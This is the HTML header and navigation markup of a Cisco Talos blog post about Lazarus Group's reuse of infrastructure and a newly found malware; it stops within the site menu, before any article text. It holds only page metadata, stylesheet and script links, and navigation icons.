<!doctype html>
<html lang="en">

<head>
    <title>Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware</title>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/bootstrap.min.css?v=007426292d">

    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/navigation.css?v=007426292d">

    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/pagination.css?v=007426292d">

    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/banners.css?v=007426292d">

    <link rel="stylesheet" href="https://blog.talosintelligence.com/assets/css/style.css?v=007426292d">

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;1,100;1,300;1,400&display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Fira+Mono:wght@400;500&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;1,100;1,300;1,400&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/ghost-theme-utils@latest/dist/css/style.min.css" rel="stylesheet">


    <meta name="description" content="Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.">
    <link rel="icon" href="https://blog.talosintelligence.com/content/images/size/w256h256/2022/07/talos_o_square.png" type="image/png">
    <link rel="canonical" href="https://blog.talosintelligence.com/lazarus-collectionrat/">
    <meta name="referrer" content="no-referrer-when-downgrade">
    
    <meta property="og:site_name" content="Cisco Talos Blog">
    <meta property="og:type" content="article">
    <meta property="og:title" content="Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware">
    <meta property="og:description" content="Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.">
    <meta property="og:url" content="https://blog.talosintelligence.com/lazarus-collectionrat/">
    <meta property="og:image" content="https://blog.talosintelligence.com/content/images/2023/08/lazarus-group-1.jpg">
    <meta property="article:published_time" content="2023-08-24T12:04:22.000Z">
    <meta property="article:modified_time" content="2023-08-25T14:18:03.000Z">
    <meta property="article:tag" content="Threats">
    <meta property="article:tag" content="SecureX">
    <meta property="article:tag" content="Landing Page Top Story">
    <meta property="article:tag" content="Top Story">
    
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware">
    <meta name="twitter:description" content="Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.">
    <meta name="twitter:url" content="https://blog.talosintelligence.com/lazarus-collectionrat/">
    <meta name="twitter:image" content="https://blog.talosintelligence.com/content/images/2023/08/lazarus-group-1.jpg">
    <meta name="twitter:label1" content="Written by">
    <meta name="twitter:data1" content="Asheer Malhotra">
    <meta name="twitter:label2" content="Filed under">
    <meta name="twitter:data2" content="Threats, SecureX, Landing Page Top Story, Top Story">
    <meta name="twitter:site" content="@TalosSecurity">
    <meta name="twitter:creator" content="@asheermalhotra">
    <meta property="og:image:width" content="2000">
    <meta property="og:image:height" content="1000">
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "Cisco Talos Blog",
        "url": "https://blog.talosintelligence.com/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://blog.talosintelligence.com/content/images/2022/11/TalosBrand_ukraine.svg"
        }
    },
    "author": {
        "@type": "Person",
        "name": "Asheer Malhotra",
        "url": "https://blog.talosintelligence.com/author/asheer-malhotra/",
        "sameAs": [
            "https://twitter.com/asheermalhotra"
        ]
    },
    "headline": "Lazarus Group&#x27;s infrastructure reuse leads to discovery of new malware",
    "url": "https://blog.talosintelligence.com/lazarus-collectionrat/",
    "datePublished": "2023-08-24T12:04:22.000Z",
    "dateModified": "2023-08-25T14:18:03.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "https://blog.talosintelligence.com/content/images/2023/08/lazarus-group-1.jpg",
        "width": 2000,
        "height": 1000
    },
    "keywords": "Threats, SecureX, Landing Page Top Story, Top Story",
    "description": "Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase. ",
    "mainEntityOfPage": "https://blog.talosintelligence.com/lazarus-collectionrat/"
}
    </script>

    <meta name="generator" content="Ghost 5.59">
    <link rel="alternate" type="application/rss+xml" title="Cisco Talos Blog" href="https://blog.talosintelligence.com/rss/">
    
    <script defer src="https://cdn.jsdelivr.net/ghost/sodo-search@~1.1/umd/sodo-search.min.js" data-key="4ffb0139d74ada998f4b141e4d" data-styles="https://cdn.jsdelivr.net/ghost/sodo-search@~1.1/umd/main.css" data-sodo-search="https://cisco-talos-blog.ghost.io/" crossorigin="anonymous"></script>
    
    <link href="https://blog.talosintelligence.com/webmentions/receive/" rel="webmention">
    <script defer src="/public/cards.min.js?v=007426292d"></script>
    <link rel="stylesheet" type="text/css" href="/public/cards.min.css?v=007426292d">
    <style type='text/css'>
    img[src*="icon_check_white.svg"] { width: 20px; margin-left: 0px; margin-right: auto; }
    
    #ghost-portal-root { display: none; }
</style>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-F45RVJG3BK"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-F45RVJG3BK');
</script>
<style>:root {--ghost-accent-color: #006db6;}</style>
</head>

<body class="post-template tag-threats tag-securex-3 tag-landing-page-top-story tag-top-story">

    <div id="mobile-page-header" class="desktop-hide">
    <h1>Cisco Talos Intelligence Blog</h1>
</div>
<input id="nav-trigger" class="nav-trigger" type="checkbox"/>
<label for="nav-trigger">
    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="22px" height="16px" viewBox="0 0 22 16">
        <g id="menu-icon">
            <path fill="#FFFFFF" d="M20.5,3h-19C0.672,3,0,2.329,0,1.5S0.672,0,1.5,0h19C21.328,0,22,0.671,22,1.5S21.328,3,20.5,3z"></path>
            <path fill="#FFFFFF" d="M20.5,9.5h-19C0.672,9.5,0,8.828,0,8c0-0.829,0.672-1.5,1.5-1.5h19C21.328,6.5,22,7.171,22,8   C22,8.828,21.328,9.5,20.5,9.5z"></path>
            <path fill="#FFFFFF" d="M20.5,16h-19C0.672,16,0,15.328,0,14.5S0.672,13,1.5,13h19c0.828,0,1.5,0.672,1.5,1.5S21.328,16,20.5,16z"></path>
        </g>
    </svg>
</label>
<nav id="nav">
    <div id="top-nav-bar">
    </div>

    <div id="navigation">
        <div class="navigation-logos-wrapper">
            <div id="cisco-logo-wrapper">
                <img src="https://blog.talosintelligence.com/assets/images/logo_cisco_white.svg?v=007426292d" alt="Cisco Systems, Inc.">
            </div>
            <div id="talos-logo-wrapper">
                <a class="navbar-brand" href="https://talosintelligence.com">
                    <img src="https://blog.talosintelligence.com/content/images/2022/11/TalosBrand_ukraine.svg" alt="Cisco Talos Blog" class="site-logo">
                </a>
            </div>
        </div>
        <div class="navigation-links-wrapper">
            <ul class="main-nav-list">
                <li class="nav-item">
                    <a class="primary_nav_link" href="https://talosintelligence.com/software">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 20 20" style="enable-background:new 0 0 20 20;" xml:space="preserve">
                            <style type="text/css">
                                .white{fill:#FFFFFF;}
                            </style>
                            <path class="white" d="M19.4,17.1c0,0.1-0.1,0-0.2,0c0,0-1.3-0.9-2-1.4c-0.2-0.1-0.5-0.1-0.6,0.1c-0.3,0.3-0.6,0.8-0.9,1.3  c-0.1,0.2-0.1,0.5,0.1,0.6l2,1.5c0.1,0,0,0.1,0.1,0.2c0,0.1,0,0.1-0.1,0.2c-1.2,0.5-2.6,0.2-3.5-0.7c-0.8-0.9-1-2-0.7-3.1L4.5,6.5  c-1,0.3-2.3,0-3-0.9c-0.8-0.9-1.1-1.7-1-2.7c0-0.1,0-0.1,0.1-0.2c0.1,0,0.2,0.1,0.2,0.1l2,1.5C3,4.4,3.3,4.5,3.4,4.2  c0,0,0.5-0.8,0.9-1.3c0.1-0.2,0.1-0.5-0.1-0.6L2.3,0.9c-0.1,0,0-0.1-0.1-0.3c0-0.1,0-0.1,0.1-0.2C3.5-0.1,5,0.2,5.8,1.1  c0.8,0.9,1,2,0.7,3.1l9.1,9.3c1-0.3,2.3,0,3,0.9c0.7,0.7,0.9,1.5,0.9,2.5C19.5,16.9,19.5,17,19.4,17.1z"></path>
                        </svg>
                        <span>Software</span>
                    </a>
                </li>
                <li class="nav-item">
                    <div class="primary-link-wrapper">
                        <a class="primary_nav_link" href="https://talosintelligence.com/vulnerability_info">
                            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="26px" height="20px" viewBox="0 0 26 20">
                                <g id="vuln-icon" class="nav-icon">
                                    <path fill="#FFFFFF" d="M24.256,18.49L13.872,0.503C13.692,0.192,13.36,0,13,0c-0.359,0-0.692,0.192-0.872,0.503L1.744,18.49  c-0.18,0.312-0.18,0.695,0,1.006C1.924,19.809,2.257,20,2.616,20h20.769c0.359,0,0.691-0.191,0.871-0.504  C24.436,19.186,24.436,18.803,24.256,18.49 M14.268,18.215h-2.533v-1.85h2.533V18.215z M14.268,15.441h-2.533L10.89,6.515h4.222  L14.268,15.441z"></path>
                                </g>
                            </svg>
                            <span>Vulnerability Information</span>
                        </a>
                    </div>
                    <input class="sub-nav-trigger" id="vuln-sub-trigger" type="checkbox">
                    <label class="sub-nav-trigger-label" for="vuln-sub-trigger">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="48.167px" height="47.75px" viewBox="0 0 48.167 47.75">
                            <circle opacity="0.4" fill="none" stroke="#FFFFFF" stroke-miterlimit="10" cx="24.083" cy="23.875" r="22"></circle>
                            <g>
                                <circle fill="#FFFFFF" cx="24.083" cy="16.068" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="23.875" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="31.682" r="2.496"></circle>
                            </g>
                        </svg>
                    </label>
                    <ul class="sub-nav">
                        <li class="desktop-hide">
                            <a href="https://talosintelligence.com/vulnerability_info">
                                <h4>Vulnerability Information</h4>
                            </a>
                        </li>
                        <li class="desktop-hide">
                            <label class="subnav-back-button" for="vuln-sub-trigger">BACK</label>
                        </li>
                        <li><a href="https://talosintelligence.com/vulnerability_reports">Vulnerability Reports</a></li>
                        <li><a href="https://talosintelligence.com/ms_advisories">Microsoft Advisories</a></li>
                    </ul>
                    <div class="desktop-hide subnav-overlay">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="26px" height="20px" viewBox="0 0 26 20">
                            <g id="vuln-icon" class="nav-icon">
                                <path fill="#FFFFFF" d="M24.256,18.49L13.872,0.503C13.692,0.192,13.36,0,13,0c-0.359,0-0.692,0.192-0.872,0.503L1.744,18.49  c-0.18,0.312-0.18,0.695,0,1.006C1.924,19.809,2.257,20,2.616,20h20.769c0.359,0,0.691-0.191,0.871-0.504  C24.436,19.186,24.436,18.803,24.256,18.49 M14.268,18.215h-2.533v-1.85h2.533V18.215z M14.268,15.441h-2.533L10.89,6.515h4.222  L14.268,15.441z"></path>
                            </g>
                        </svg>
                    </div>
                </li>
                <li class="nav-item">
                    <div class="primary-link-wrapper">
                        <a class="primary_nav_link" href="https://talosintelligence.com/reputation">
                            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 20 20" height="20px" width="20px" style="enable-background:new 0 0 20 20;" xml:space="preserve">
                                <style type="text/css">
                                    .white{fill:#FFFFFF;}
                                </style>
                                <g>
                                <path class="white" d="M19.5,9.5h-1.1c-0.3-4.2-3.6-7.6-7.8-7.8V0.5C10.5,0.2,10.3,0,10,0l0,0C9.7,0,9.5,0.2,9.5,0.5l0,0v1.1   C5.3,1.9,1.9,5.3,1.6,9.5H0.5C0.2,9.5,0,9.7,0,10s0.2,0.5,0.5,0.5l0,0h1.1c0.3,4.2,3.6,7.6,7.8,7.8v1.1c0,0.3,0.2,0.5,0.5,0.5l0,0   c0.3,0,0.5-0.2,0.5-0.5l0,0v-1.1c4.2-0.3,7.6-3.6,7.8-7.8h1.1c0.3,0,0.5-0.2,0.5-0.5C20,9.7,19.8,9.5,19.5,9.5 M16.6,10.5h0.7   c-0.3,3.6-3.2,6.5-6.8,6.8v-0.8c0-0.3-0.2-0.5-0.5-0.5l0,0c-0.3,0-0.5,0.2-0.5,0.5v0.8C5.8,17,3,14.2,2.7,10.5h0.8   C3.8,10.5,4,10.3,4,10S3.8,9.5,3.5,9.5l0,0H2.7C3,5.8,5.8,3,9.5,2.7v0.8C9.5,3.7,9.7,4,10,4l0,0c0.3,0,0.5-0.2,0.5-0.5V2.7   C14.2,3,17,5.8,17.3,9.5h-0.7c-0.3,0-0.5,0.2-0.5,0.5C16.1,10.3,16.3,10.5,16.6,10.5L16.6,10.5"></path>
                                    <circle class="white" cx="10" cy="10" r="3.2"></circle>
                                </g>
                            </svg>
                            <span>
                                Reputation Center
                            </span>
                        </a>
                    </div>
                    <input class="sub-nav-trigger" id="reputation-sub-trigger" type="checkbox">
                    <label class="sub-nav-trigger-label" for="reputation-sub-trigger">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="48.167px" height="47.75px" viewBox="0 0 48.167 47.75">
                            <circle opacity="0.4" fill="none" stroke="#FFFFFF" stroke-miterlimit="10" cx="24.083" cy="23.875" r="22"></circle>
                            <g>
                                <circle fill="#FFFFFF" cx="24.083" cy="16.068" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="23.875" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="31.682" r="2.496"></circle>
                            </g>
                        </svg>
                    </label>
                    <ul class="sub-nav">
                        <li class="desktop-hide">
                            <a href="https://talosintelligence.com/reputation">
                                <h4>Reputation Center</h4>
                            </a>
                        </li>
                        <li class="desktop-hide">
                            <label class="subnav-back-button" for="reputation-sub-trigger">BACK</label>
                        </li>
                        <li><a data-method="get" href="https://talosintelligence.com/reputation_center">IP &amp; Domain Reputation</a></li>
                        <li><a href="https://talosintelligence.com/talos_file_reputation">Talos File Reputation</a></li>
                        <li><a href="https://talosintelligence.com/amp-naming">Secure Endpoint Naming Conventions</a></li>
                        <li><a href="https://talosintelligence.com/categories">Intelligence Categories</a></li>
                    </ul>
                    <div class="desktop-hide subnav-overlay">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 20 20" height="20px" width="20px" style="enable-background:new 0 0 20 20;" xml:space="preserve">
                            <style type="text/css">
                                .white{fill:#FFFFFF;}
                            </style>
                            <g>
                            <path class="white" d="M19.5,9.5h-1.1c-0.3-4.2-3.6-7.6-7.8-7.8V0.5C10.5,0.2,10.3,0,10,0l0,0C9.7,0,9.5,0.2,9.5,0.5l0,0v1.1   C5.3,1.9,1.9,5.3,1.6,9.5H0.5C0.2,9.5,0,9.7,0,10s0.2,0.5,0.5,0.5l0,0h1.1c0.3,4.2,3.6,7.6,7.8,7.8v1.1c0,0.3,0.2,0.5,0.5,0.5l0,0   c0.3,0,0.5-0.2,0.5-0.5l0,0v-1.1c4.2-0.3,7.6-3.6,7.8-7.8h1.1c0.3,0,0.5-0.2,0.5-0.5C20,9.7,19.8,9.5,19.5,9.5 M16.6,10.5h0.7   c-0.3,3.6-3.2,6.5-6.8,6.8v-0.8c0-0.3-0.2-0.5-0.5-0.5l0,0c-0.3,0-0.5,0.2-0.5,0.5v0.8C5.8,17,3,14.2,2.7,10.5h0.8   C3.8,10.5,4,10.3,4,10S3.8,9.5,3.5,9.5l0,0H2.7C3,5.8,5.8,3,9.5,2.7v0.8C9.5,3.7,9.7,4,10,4l0,0c0.3,0,0.5-0.2,0.5-0.5V2.7   C14.2,3,17,5.8,17.3,9.5h-0.7c-0.3,0-0.5,0.2-0.5,0.5C16.1,10.3,16.3,10.5,16.6,10.5L16.6,10.5"></path>
                                <circle class="white" cx="10" cy="10" r="3.2"></circle>
                            </g>
                        </svg>
                    </div>
                </li>
                <li class="nav-item">
                    <a class="primary_nav_link" href="https://talosintelligence.com/resources">
                        <svg xmlns="http://www.w3.org/2000/svg" width="124.999" height="153.391" viewBox="0 0 124.999 153.391">
                            <g>
                                <polygon points="89.149 8.214 89.149 37.263 118.199 37.263 89.149 8.214" fill="#fff"></polygon>
                                <path d="M80.2,44.8V0H21.122A3.72,3.72,0,0,0,17.4,3.719V135.361H121.28A3.719,3.719,0,0,0,125,131.643V44.8ZM36.6,30.7H68.138v7.809H36.6Zm0,24.188h64.427V62.7H36.6Zm0,24.185H79.557v7.809H36.6Zm64.752,32H36.6v-7.81h64.752Z" fill="#fff"></path>
                                <path d="M9.606,18.03H3.718A3.719,3.719,0,0,0,0,21.749V149.672a3.719,3.719,0,0,0,3.718,3.719H103.877a3.72,3.72,0,0,0,3.719-3.719v-6.354H9.942Z" fill="#fff"></path>
                            </g>
                        </svg>
                        <span>Library</span>
                    </a>
                </li>
                <li class="nav-item">
                    <a class="primary_nav_link" href="https://support.talosintelligence.com/">
                        <svg xmlns="http://www.w3.org/2000/svg" width="26px" height="20px" viewBox="0 0 123.17 159.292">
                            <path d="M61.59,0,0,17.069v85.32c0,23.472,61.59,56.9,61.59,56.9s61.58-36.288,61.58-56.9V17.069Zm-.433,149.746C38.314,136.662,8.128,114.3,8.128,102.389V23.239l53.029-14.7Z" fill="#fff"></path>
                        </svg>
                        <span>Support</span>
                    </a>
                </li>
                <li class="nav-item">
                    <a class="primary_nav_link" href="https://talosintelligence.com/incident_response">
                        <svg xmlns="http://www.w3.org/2000/svg" width="111.588" height="148.311" viewBox="0 0 111.588 148.311">
                            <path d="M1.181,128.446v15.7a4.167,4.167,0,0,0,4.167,4.167h100.9a4.167,4.167,0,0,0,4.167-4.167v-15.7a4.167,4.167,0,0,0-4.167-4.167H5.348a4.167,4.167,0,0,0-4.167,4.166M55.8,63.109a3.277,3.277,0,1,1,0,6.553c-10.344,0-20.755,8.578-20.755,18.57a3.277,3.277,0,1,1-6.554,0C28.489,73.947,41.93,63.109,55.8,63.109Zm0-12.016c-21.787,0-39.325,17.81-39.325,39.937v26.7H95.122V91.03c0-22.128-17.537-39.937-39.324-39.937m52.365-38.3a3.291,3.291,0,0,0-2.254,1.024L88.432,31.294a3.283,3.283,0,0,0,4.642,4.644l17.478-17.479a3.278,3.278,0,0,0-2.389-5.666m-105.138,0a3.276,3.276,0,0,0-1.98,5.666L18.522,35.938a3.283,3.283,0,0,0,4.643-4.644L5.687,13.817A3.255,3.255,0,0,0,3.025,12.793ZM55.389.026a3.276,3.276,0,0,0-2.867,3.345V19.642a3.277,3.277,0,1,0,6.554,0V3.371A3.283,3.283,0,0,0,55.389.026Z" fill="#fff"></path>
                        </svg>
                        <span>Incident Response</span>
                    </a>
                </li>

                <li class="nav-item">
                    <a class="primary_nav_link" href="https://talosintelligence.com/careers">
                        <svg xmlns="http://www.w3.org/2000/svg" width="153.816" height="90" viewBox="0 0 153.816 90">
                            <g>
                                <path d="M56.336,47.451a31.328,31.328,0,0,0-17.1-10.872A19.564,19.564,0,0,0,50.91,19.1C50.91,8.868,42.008,0,31.735,0S12.559,8.868,12.559,19.1A19.564,19.564,0,0,0,24.22,36.574,31.239,31.239,0,0,0,0,66.717c0,2.343,12.671,10.9,31.883,10.9a63.142,63.142,0,0,0,6.536-.341,37,37,0,0,1,8.222-21.367,38.039,38.039,0,0,1,9.7-8.456" fill="#fff" fill-rule="evenodd"></path>
                                <path d="M106.731,70.729a32.386,32.386,0,0,0-1.889-4.815c-.014-.029-.028-.058-.043-.087a32.308,32.308,0,0,0-2.568-4.335c-.033-.047-.066-.095-.1-.142-.312-.436-.631-.866-.964-1.287l-.015-.02a32.215,32.215,0,0,0-2.185-2.483l-.166-.168c-.369-.372-.745-.737-1.131-1.09l-.025-.024c-.415-.379-.838-.744-1.272-1.1l-.081-.064q-.582-.474-1.189-.92l-.217-.159c-.43-.312-.866-.616-1.313-.9h0a31.084,31.084,0,0,0-9.679-4.164A19.564,19.564,0,0,0,95.566,31.488c0-10.234-8.9-19.1-19.175-19.1s-19.176,8.868-19.176,19.1A19.564,19.564,0,0,0,68.876,48.96a31.828,31.828,0,0,0-9.109,3.733h0a31.8,31.8,0,0,0-6.941,5.668l-.045.05a31.3,31.3,0,0,0-2.243,2.738l-.024.034q-.5.693-.969,1.415c-.014.023-.03.047-.046.07a31.053,31.053,0,0,0-1.7,3.019c-.028.059-.057.117-.085.175a30.16,30.16,0,0,0-1.33,3.185c-.02.056-.038.112-.058.169q-.255.741-.474,1.5c-.019.065-.039.13-.057.2a30.092,30.092,0,0,0-.741,3.374c-.015.094-.03.188-.044.282-.084.56-.158,1.123-.211,1.693v.007c-.087.935-.135,1.88-.135,2.834,0,2.343,12.671,10.9,31.883,10.9s31.583-8.555,31.583-10.9a32.8,32.8,0,0,0-1.384-8.35l-.007-.023" fill="#fff" fill-rule="evenodd"></path>
                                <path d="M129.588,36.579A19.564,19.564,0,0,0,141.261,19.1c0-10.234-8.9-19.1-19.175-19.1S102.91,8.868,102.91,19.1a19.562,19.562,0,0,0,11.66,17.472A31.817,31.817,0,0,0,96.916,47.859a38.586,38.586,0,0,1,17.373,29.253,63.062,63.062,0,0,0,7.945.5c19.212,0,31.582-8.554,31.582-10.9a31.947,31.947,0,0,0-24.228-30.138" fill="#fff" fill-rule="evenodd"></path>
                            </g>
                        </svg>
                        <span>Careers</span>
                    </a>
                </li>

                <li class="nav-item">
                    <div class="primary-link-wrapper">
                        <a id="link_blog" class="primary_nav_link" href="https://blog.talosintelligence.com">
                            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" width="260px" height="296.5px" viewBox="0 0 260 296.5" enable-background="new 0 0 260 296.5" xml:space="preserve">
                                <path fill="#FFFFFF" d="M243.586,42.404h-14.448c-0.943-4.513-3.143-8.813-6.616-12.33L201.793,9.098  c-4.7-4.757-10.972-7.377-17.66-7.377c-6.578,0-12.777,2.547-17.457,7.173l-33.875,33.511H17.586c-6.6,0-12,5.399-12,12V226.28  c0,6.6,5.4,12,12,12H153.83l84.21,56.278l-27.448-56.278h32.994c6.6,0,12-5.4,12-12V54.404  C255.586,47.804,250.186,42.404,243.586,42.404z M214.662,48.045c-0.01,0.2-0.021,0.399-0.044,0.599  c-0.008,0.069-0.021,0.139-0.031,0.207c-0.046,0.345-0.113,0.688-0.196,1.026c-0.034,0.137-0.063,0.273-0.103,0.408  c-0.039,0.135-0.087,0.267-0.133,0.399c-0.051,0.151-0.102,0.302-0.16,0.45c-0.049,0.126-0.105,0.249-0.16,0.373  c-0.068,0.153-0.139,0.307-0.216,0.457c-0.059,0.116-0.12,0.23-0.184,0.345c-0.088,0.157-0.181,0.312-0.278,0.465  c-0.065,0.104-0.13,0.206-0.2,0.308c-0.115,0.168-0.239,0.33-0.366,0.492c-0.064,0.081-0.124,0.165-0.19,0.244  c-0.199,0.238-0.409,0.472-0.635,0.694L82.458,182.308l-47.932,12.871l13.427-47.74L177.223,19.561  c1.917-1.895,4.414-2.84,6.911-2.84c2.534,0,5.068,0.975,6.99,2.92l20.726,20.974c0.545,0.552,1.002,1.156,1.39,1.79  c0.574,0.938,0.975,1.951,1.206,2.993c0.004,0.021,0.01,0.04,0.014,0.06c0.049,0.226,0.086,0.453,0.119,0.682  c0.008,0.06,0.017,0.118,0.024,0.178c0.026,0.211,0.045,0.424,0.058,0.636c0.004,0.077,0.007,0.153,0.009,0.23  c0.007,0.203,0.011,0.407,0.005,0.61C214.673,47.877,214.666,47.961,214.662,48.045z"></path>
                            </svg>
                            <span>Blog</span>
                        </a>
                    </div>
                    <input id="blog-sub-trigger" class="sub-nav-trigger" type="checkbox"/>
                    <label class="sub-nav-trigger-label" for="blog-sub-trigger">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="48.167px" height="47.75px" viewBox="0 0 48.167 47.75">
                            <circle opacity="0.4" fill="none" stroke="#FFFFFF" stroke-miterlimit="10" cx="24.083" cy="23.875" r="22"></circle>
                            <g>
                                <circle fill="#FFFFFF" cx="24.083" cy="16.068" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="23.875" r="2.496"></circle>
                                <circle fill="#FFFFFF" cx="24.083" cy="31.682" r="2.496"></circle>
                            </g>
                        </svg>
                    </label>
                    <ul class="sub-nav">
                        <li class="desktop-hide">
                            <a href="https://blog.talosintelligence.com">
                                <h4>Blog</h4>
                            </a>
                        </li>
                        <li class="desktop-hide">
                            <label class="subnav-back-button" for="blog-sub-trigger">BACK</label>
                        </li>
                        <li>
                            <a href="https://blog.talosintelligence.com">Talos Blog</a>
                        </li>
                        <li>
                            <a href="https://blog.talosintelligence.com/category/threat-source-newsletter/">Talos Threat Source Newsletter</a>
                        </li>
                    </ul>
                    <div class="desktop-hide subnav-overlay">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" width="20px" height="20px" viewBox="0 0 260 296.5" enable-background="new 0 0 260 296.5" xml:space="preserve">
                            <path fill="#FFFFFF" d="M243.586,42.404h-14.448c-0.943-4.513-3.143-8.813-6.616-12.33L201.793,9.098  c-4.7-4.757-10.972-7.377-17.66-7.377c-6.578,0-12.777,2.547-17.457,7.173l-33.875,33.511H17.586c-6.6,0-12,5.399-12,12V226.28  c0,6.6,5.4,12,12,12H153.83l84.21,56.278l-27.448-56.278h32.994c6.6,0,12-5.4,12-12V54.404  C255.586,47.804,250.186,42.404,243.586,42.404z M214.662,48.045c-0.01,0.2-0.021,0.399-0.044,0.599  c-0.008,0.069-0.021,0.139-0.031,0.207c-0.046,0.345-0.113,0.688-0.196,1.026c-0.034,0.137-0.063,0.273-0.103,0.408  c-0.039,0.135-0.087,0.267-0.133,0.399c-0.051,0.151-0.102,0.302-0.16,0.45c-0.049,0.126-0.105,0.249-0.16,0.373  c-0.068,0.153-0.139,0.307-0.216,0.457c-0.059,0.116-0.12,0.23-0.184,0.345c-0.088,0.157-0.181,0.312-0.278,0.465  c-0.065,0.104-0.13,0.206-0.2,0.308c-0.115,0.168-0.239,0.33-0.366,0.492c-0.064,0.081-0.124,0.165-0.19,0.244  c-0.199,0.238-0.409,0.472-0.635,0.694L82.458,182.308l-47.932,12.871l13.427-47.74L177.223,19.561  c1.917-1.895,4.414-2.84,6.911-2.84c2.534,0,5.068,0.975,6.99,2.92l20.726,20.974c0.545,0.552,1.002,1.156,1.39,1.79  c0.574,0.938,0.975,1.951,1.206,2.993c0.004,0.021,0.01,0.04,0.014,0.06c0.049,0.226,0.086,0.453,0.119,0.682  c0.008,0.06,0.017,0.118,0.024,0.178c0.026,0.211,0.045,0.424,0.058,0.636c0.004,0.077,0.007,0.153,0.009,0.23  c0.007,0.203,0.011,0.407,0.005,0.61C214.673,47.877,214.666,47.961,214.662,48.045z"></path>
                        </svg>

                    </div>
                </li>

                <li class="nav-item">
                    <div class="primary-link-wrapper">
                        <a class="primary_nav_link" href="https://talosintelligence.com/podcasts">
                            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="podcast-icon-nav" x="0px" y="0px" viewBox="0 0 71.8 75" width="26px" height="20px" style="enable-background:new 0 0 71.8 75;" xml:space="preserve">
                                <style type="text/css">
                                    .podcast-fill{fill:#fff;}
                                </style>
                                <path class="podcast-fill" d="M21.8,15.1c0-7.8,6.3-14.1,14.1-14.1c7.8,0,14.1,6.3,14.1,14.1v25.4c0,7.8-6.3,14.1-14.1,14.1  c-7.8,0-14.1-6.3-14.1-14.1V15.1z M59.9,40.1c0,12.4-9.4,22.6-21.5,23.9v3.6h12.8c1.4,0,2.6,1.2,2.6,2.6c0,1.4-1.2,2.6-2.6,2.6H20.4  c-1.4,0-2.6-1.2-2.6-2.6c0-1.4,1.2-2.6,2.6-2.6h12.8V64c-12-1.3-21.5-11.5-21.5-23.9v-6.8c0-1.4,1.2-2.6,2.6-2.6  c1.4,0,2.6,1.2,2.6,2.6v6.8c0,10.4,8.5,18.8,18.8,18.8c10.4,0,18.8-8.5,18.8-18.9v-6.8c0-1.4,1.2-2.6,2.6-2.6c1.4,0,2.6,1.2,2.6,2.6  V40.1z"></path>
                            </svg>

                            <span>
                                Podcasts
                            </span>
                        </a>
                    </div>
                    <input class="sub-nav-trigger" id="podcast-sub-trigger" type="checkbox">
                    <label class="sub-nav-trigger-label" for="podcast-sub-trigger">
                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="48.167px" height="47.75px" viewBox="0 0 48.167 47.75">
                            <circle opacity="0.4" fill="none" stroke="#FFFFFF" stroke-miterlimit="10" cx="24.083" cy="23.875" r="22"></circle>
